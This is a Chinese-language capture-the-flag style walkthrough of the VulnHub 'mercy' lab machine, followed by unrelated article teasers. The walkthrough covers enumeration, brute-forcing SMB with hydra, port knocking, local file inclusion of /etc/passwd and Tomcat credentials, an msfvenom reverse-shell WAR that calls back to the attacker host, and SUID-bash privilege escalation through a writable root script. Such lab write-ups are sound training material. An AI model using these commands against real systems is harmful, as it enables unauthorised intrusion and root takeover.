vulnhub靶場之【digitalworld.local系列】的mercy靶機

前言

靶機:digitalworld.local-mercy,IP地址為192.168.10.11

攻擊:kali,IP地址為192.168.10.6

kali采用VMware虛擬機,靶機選擇使用VMware打開文件,都選擇橋接網絡

這里官方給的有兩種方式,一是直接使用virtualbox加載,另一種是通過VMware直接加載,也給出了iso鏡像文件。

文章中涉及的靶機,來源于vulnhub官網,想要下載,可自行訪問官網下載,或者通過網盤下載 https://pan.quark.cn/s/86cf8a398835

主機發現

使用arp-scan -lnetdiscover -r 192.168.10.1/24掃描

也可以使用nmap等工具進行

信息收集

使用nmap掃描端口

掃描tcp端口,并保存于nmap-tcp

nmap -sT 192.168.10.11 --min-rate=1000 -p- -oA nmap-tcp

掃描常見的20個udp端口,不過這里的端口明顯處于open的很少

nmap -sU 192.168.10.11 --top-ports 20 -T4 -oA nmap-udp

把前面掃描出的tcp、udp端口,進行處理,只取端口號

grep open nmap-tcp.nmap | awk -F'/' '{print $1}' | paste -sd ','
grep open nmap-udp.nmap | grep -v "open|filtered" | awk -F'/' '{print $1}' | paste -sd ','
#這里就是包括可能開放的端口都不要,因為是靶機,可能過濾的話,也會無法進一步掃描
ports=53,110,139,143,445,993,995,8080,123,137

對特定的端口號進行深入探測

nmap -sV -O -sC -sT 192.168.10.11 -p $ports -oA detail

6

7

對特定的端口號進行漏洞檢測,前面端口的檢測,基本上都是在中間人攻擊時,數據傳輸的問題

這里對于http服務進行了簡單的枚舉

nmap --script=vuln 192.168.10.11 -p $ports -oA vuln

網站信息收集

還是從網站開始下手進行

訪問8080端口的界面,查看頁面源代碼,無信息暴露,不過在文章最后提到兩個地址,是可以訪問的,不過需要認證,也就是登錄

訪問manager界面

訪問host-manager界面

使用gobuster進行目錄爆破,也可以使用其他工具,如dirb、dirsearch

gobuster dir -u http://192.168.10.11:8080 -w /usr/share/wordlists/dirb/big.txt -x php,bak,txt,js,html -b 403-404

與之前使用nmap腳本時,枚舉的差不多,這里主要就是robots.txt文件

訪問robots.txt文件,發現一個路徑

訪問/tryharder/tryharder,發現是某種編碼處理后的數據

根據特性,可能是base64編碼,使用命令進行解碼處理

echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg==' | base64 -d 

這里可以看到,解碼后是一段內容,主要就是弱密碼的問題,這里提示password,就是弱密碼了

這里嘗試之前的兩個界面去登錄測試,發現并不可取,嘖,直接進行爆破也是可以,不過暫時繼續收集信息

smb信息收集

使用enum4linux進行枚舉,發現幾個用戶和共享

enum4linux -a 192.168.10.11

17

使用nmap的腳本進行探測

nmap --script=smb* 192.168.10.11

根據已知信息,進行匯集

用戶名有pleadformercy、qiu、fluffy、thisisasuperduperlonguser

密碼有一個暴露的提示,不知是否可用password,不過這也提示可能是弱密碼

現在無ssh服務,可以進行密碼爆破的有兩處,一個是http的基本認證和smb的爆破

漏洞尋找

先進行爆破測試,把之前獲取的用戶名保存在user文件

hydra -L user -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.10.11 smb

這里可以看到,爆破出的密碼和給出的密碼是一樣的,都是password

以這個賬戶去登錄測試

smbclient //192.168.10.11/qiu -U qiu

把所有內容下載到kali

prompt		#關閉交互,這樣下載時,默認選擇yes
recurce		#開啟遞歸,把文件夾中的文件也會下載
mget *		#下載所有內容

23

查看所有文件,尋找有無可用信息

訪問.private目錄時,發現有信息,這里可能有東西

關鍵配置文件泄露

最終在opensesame目錄下的config文件發現好多配置

首先就是端口的開啟與關閉,采用開門的形式,這里是對http80端口和ssh22端口的配置

先開啟吧,這里可以使用knocknc按照序列即可開啟端口

nc 192.168.10.11 159
nc 192.168.10.11 27391
nc 192.168.10.11 4

再開啟22端口,一定要按照序列的順序

knock 192.168.10.11 17301 28504 9999

后面的配置信息都是apache2smb的一些信息,并未透露什么敏感信息

那么訪問80端口,只有這個信息,并且查看頁面源代碼也沒有信息

和前面的8080端口網站一樣,訪問robots.txt文件試試有沒有

發現兩個路徑/mercy、nomercy,訪問mercy,發現是一段話,并且可能無用

訪問nomercy,這可能是一個cms,并且在測試時,點擊按鈕無反應,并且界面中顯示出了可能是cms的名稱和版本信息

使用whatweb進行探測,確實如此

whatweb http://192.168.10.11/nomercy

漏洞利用

使用searchsploit搜索有無漏洞可利用,有一個

查看這個文檔,兩個可能,不過看來都像是文件包含

一個個的測試,先測試/windows/code.php

http://192.168.10.11/nomercy/windows/code.php?file=../../../../../../etc/passwd

這個也行,但是顯示結果只有一行

http://192.168.10.11/nomercy/windows/function.php?file=../../../../../../etc/passwd

嘗試進行遠程文件包含測試,發現并不行,雖然遠程文件是包含了,但是作為php相當于沒有被解析

目前還有個8080端口的配置文件可以包含查看一下,其他文件嘗試包含并不行

之前在8080端口的默認網站的最下面,提示到了這個用戶方面的配置文件的位置/etc/tomcat7/tomcat-users.xml

直接包含這個文件進行查看,獲取兩組,不過從配置來看thisisasuperduperlonguser權限更大

用戶名密碼
thisisasuperduperlonguserheartbreakisinevitable
fluffyfreakishfluffybunny

通過war文件反彈shell

登錄后,發現有部署war文件,那么就需要測試

使用msfenvm生成一個腳本

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.6 LPORT=9999 -f war -o shell.war

kali中使用nc監聽對應的端口

nc -lvnp 9999

然后部署后,點擊部署的名稱shell,即可獲取到反彈shell

水平提權

在這里折騰了一會,就沒截圖,直接切換fluffy用戶,所用的密碼就是在tomcat的配置文件中發現的兩組用戶,為什么能切換,首先就是確認了系統中有這個用戶,然后就是測試是否存在一個密碼多用的情況

fluffy的家目錄下的一個文件夾中,發現一個疑似定時任務的腳本,所屬者為root,并且這個文件別人是可以修改的

就先添加一句,因為目前不確定

echo "chmod +s /bin/bash" >> timeclock

靶機內信息收集

收集系統內核及系統版本

uname -a/-r
cat /etc/issue
cat /etc/*release

查看網絡連接狀態

ip add
ss -antlp

查看以root執行的進程

ps aux | grep root

上傳pspy64腳本,發現無法執行,上傳les.sh腳本,發現幾個可能性高的漏洞

但是因為靶機內沒有gcccc,所以我測試前面可能性較高的都無法執行后,就放棄了

使用find尋找具有SUID權限的文件

find / -perm -u=s -type f 2>/dev/null

垂直提權至root

這里測試sudo -l也是對當前用戶無用的,這里的/bin/bash讓我確信,是前面的定時腳本任務執行了

echo "chmod +s /bin/bash" >> timeclock

就是這個在前面先輸入進去的

執行語句進行提權,然后查看/root下的證明

/bin/bash -p

總結

該靶機考察以下幾點:

  1. 一個常見的robots.txt泄露敏感目錄
  2. 常見的編碼,這里是base64
  3. smb服務的連接,以及文件的下載
  4. 端口敲門服務,需要特定的序列順序
  5. 識別cms并得知其漏洞,這里就是文件包含漏洞,但是配合tomcat的用戶配置文件的位置泄露,導致獲取到關鍵信息
  6. 對于tomcatwar文件部署,通過msfvenom生成腳本文件,并獲取反彈shell
  7. 水平提權時,用戶可能存在一碼多用的情況
  8. 提權至root時,收集到一個疑似定時任務的腳本,嘗試寫入語句,最終成功執行了。不過這里沒找到定時任務的內容,嘖。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/72797.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/72797.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/72797.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

Fiddler抓取App接口-Andriod/IOS配置方法

Andriod配置方法: 1)確保手機和Fiddler所在主機在同一個局域網中 2)獲取Fiddler所在主機的ip地址,通過cmd命令進入命令編輯器,輸入ipconfig -all,找到IPv4地址,記下該地址 3)對手機…

步進電機軟件細分算法解析與實踐指南

1. 步進電機細分技術概述 步進電機是一種將電脈沖信號轉換為角位移的執行機構,其基本運動單位為步距角。傳統步進電機的步距角通常為 1.8(對應 200 步 / 轉),但在高精度定位場景下,這種分辨率已無法滿足需求。細分技術…

C語言_數據結構總結2:動態分配方式的順序表

0——靜態分配內存的順序表和動態分配內存的順序表的相同之處和不同之處 相同之處 基本操作邏輯相同:無論是靜態分配還是動態分配的順序表,其核心的操作邏輯是一致的。例如插入操作都需要將插入位置之后的元素依次后移,刪除操作都需要將刪除…

Vue 與 Element UI 深度探秘:從 Array.isArray 到動態綁定的技術之旅!?

以下是一篇深入的技術博客&#xff0c;基于我們對 compare-form.vue 和 <w-form-select.vue> 的所有討論&#xff0c;涵蓋 Array.isArray、option-label/option-value、:list 動態綁定、: 語法以及 Vue 2/3 兼容性等問題。博客風格輕松有趣&#xff0c;加入 SVG 圖解和實…

計算機視覺|3D卷積網絡VoxelNet:點云檢測的革新力量

一、引言 在科技快速發展的背景下&#xff0c;3D 目標檢測技術在自動駕駛和機器人領域中具有重要作用。 在自動駕駛領域&#xff0c;車輛需實時、準確感知周圍環境中的目標物體&#xff0c;如行人、車輛、交通標志和障礙物等。只有精確檢測這些目標的位置、姿態和類別&#x…

前端打包優化相關 Webpack

前端打包優化相關 Webpack 打包時間的優化&#xff08;基于 Vue CLI 4 Webpack 5&#xff09; 1. Webpack 配置減少打包時間 1.1 對 JS 配置&#xff1a;排除 node_modules 和 src 中的打包內容 在開發環境下&#xff0c;修改 Webpack 的 JS 規則&#xff0c;排除 /node_m…

leetcode69.x 的平方根

題目&#xff1a; 給你一個非負整數 x &#xff0c;計算并返回 x 的 算術平方根 。 由于返回類型是整數&#xff0c;結果只保留 整數部分 &#xff0c;小數部分將被 舍去 。 注意&#xff1a;不允許使用任何內置指數函數和算符&#xff0c;例如 pow(x, 0.5) 或者 x ** 0.5 。…

Docker 部署 MongoDB 并持久化數據

Docker 部署 MongoDB 并持久化數據 在現代開發中&#xff0c;MongoDB 作為 NoSQL 數據庫廣泛應用&#xff0c;而 Docker 則提供了高效的容器化方案。本教程將介紹如何使用 Docker 快速部署 MongoDB&#xff0c;并實現數據持久化&#xff0c;確保數據不會因容器重啟或刪除而丟失…

信奧賽CSP-J復賽集訓(模擬算法專題)(3):P1089 [NOIP 2004 提高組] 津津的儲蓄計劃

信奧賽CSP-J復賽集訓&#xff08;模擬算法專題&#xff09;&#xff08;3&#xff09;&#xff1a;P1089 [NOIP 2004 提高組] 津津的儲蓄計劃 題目描述 津津的零花錢一直都是自己管理。每個月的月初媽媽給津津 300 300 300 元錢&#xff0c;津津會預算這個月的花銷&#xff0…

日新F1、瑞研F600P 干線光纖熔接(熔接損耗最大0.03DB)

Ⅰ. 設備特性對比與實測驗證 1. 日新F1&#xff08;兩馬達&#xff09;極限參數 切割角度&#xff1a;必須≤0.3&#xff08;雙邊累計誤差&#xff1c;0.6&#xff09; ? 實測案例&#xff1a;切割0.35時&#xff0c;損耗波動達0.05-0.08dB&#xff08;超干線標準&#xff09…

【量化科普】Sharpe Ratio,夏普比率

【量化科普】Sharpe Ratio&#xff0c;夏普比率 &#x1f680;量化軟件開通 &#x1f680;量化實戰教程 在量化投資領域&#xff0c;夏普比率&#xff08;Sharpe Ratio&#xff09;是一個非常重要的風險調整后收益指標。它由諾貝爾經濟學獎得主威廉F夏普&#xff08;William…

數據結構--【順序表與鏈表】筆記

順序表 template <class T> class arrList :public List<T> //表示 arrList 類以公有繼承的方式繼承自 List<T> 類 //公有繼承意味著 List<T> 類的公共成員在 arrList 類中仍然是公共成員&#xff0c;受保護成員在 arrList 類中仍然是受保護成員。 { …

idea中隱藏目錄

可能的解決步驟&#xff1a; 排除目錄的方法是否在2021版本中有變化&#xff1f;應該沒有&#xff0c;還是通過右鍵標記為排除。 用戶可能想完全隱藏目錄&#xff0c;比如在項目視圖中不顯示&#xff0c;這可能需要調整項目視圖的設置&#xff0c;比如取消勾選“顯示排除的文件…

AWS 如何導入內部SSL 證書

SSL 證書的很重要的功能就是 HTTP- > HTTPS, 下面就說明一下怎么導入ssl 證書,然后綁定證書到ALB. 以下示例說明如何使用 AWS Management Console 導入證書。 從以下位置打開 ACM 控制臺:https://console.aws.amazon.com/acm/home。如果您是首次使用 ACM,請查找 AWS Cer…

2025最新群智能優化算法:基于RRT的優化器(RRT-based Optimizer,RRTO)求解23個經典函數測試集,MATLAB

一、基于RRT的優化器 基于RRT的優化器&#xff08;RRT-based Optimizer&#xff0c;RRTO&#xff09;是2025年提出的一種新型元啟發式算法。其受常用于機器人路徑規劃的快速探索隨機樹&#xff08;RRT&#xff09;算法的搜索機制啟發&#xff0c;首次將RRT算法的概念與元啟發式…

doris: Oracle

Apache Doris JDBC Catalog 支持通過標準 JDBC 接口連接 Oracle 數據庫。本文檔介紹如何配置 Oracle 數據庫連接。 使用須知? 要連接到 Oracle 數據庫&#xff0c;您需要 Oracle 19c, 18c, 12c, 11g 或 10g。 Oracle 數據庫的 JDBC 驅動程序&#xff0c;您可以從 Maven 倉庫…

im即時聊天客服系統SaaS還是私有化部署:成本、安全與定制化的權衡策略

隨著即時通訊技術的不斷發展&#xff0c;IM即時聊天客服系統已經成為企業與客戶溝通、解決問題、提升用戶體驗的重要工具。在選擇IM即時聊天客服系統時&#xff0c;企業面臨一個重要決策&#xff1a;選擇SaaS&#xff08;軟件即服務&#xff09;解決方案&#xff0c;還是進行私…

mysql中in和exists的區別?

大家好&#xff0c;我是鋒哥。今天分享關于【mysql中in和exists的區別?】面試題。希望對大家有幫助&#xff1b; mysql中in和exists的區別? 1000道 互聯網大廠Java工程師 精選面試題-Java資源分享網 在 MySQL 中&#xff0c;IN 和 EXISTS 都用于進行子查詢&#xff0c;但它…

element-plus中table組件的使用

1、table組件的基本使用 注意&#xff1a; ①對象集合&#xff0c;要從后端查詢。 ②prop是集合中的對象的屬性名&#xff1b;label是表格表頭的名稱。 2、將性別一列的71轉為男&#xff0c;72轉為女 問題描述&#xff1a; 解決步驟&#xff1a; ①將el-table-column變成雙標簽…

Django小白級開發入門

1、Django概述 Django是一個開放源代碼的Web應用框架&#xff0c;由Python寫成。采用了MTV的框架模式&#xff0c;即模型M&#xff0c;視圖V和模版T。 Django 框架的核心組件有&#xff1a; 用于創建模型的對象關系映射為最終用戶設計較好的管理界面URL 設計設計者友好的模板…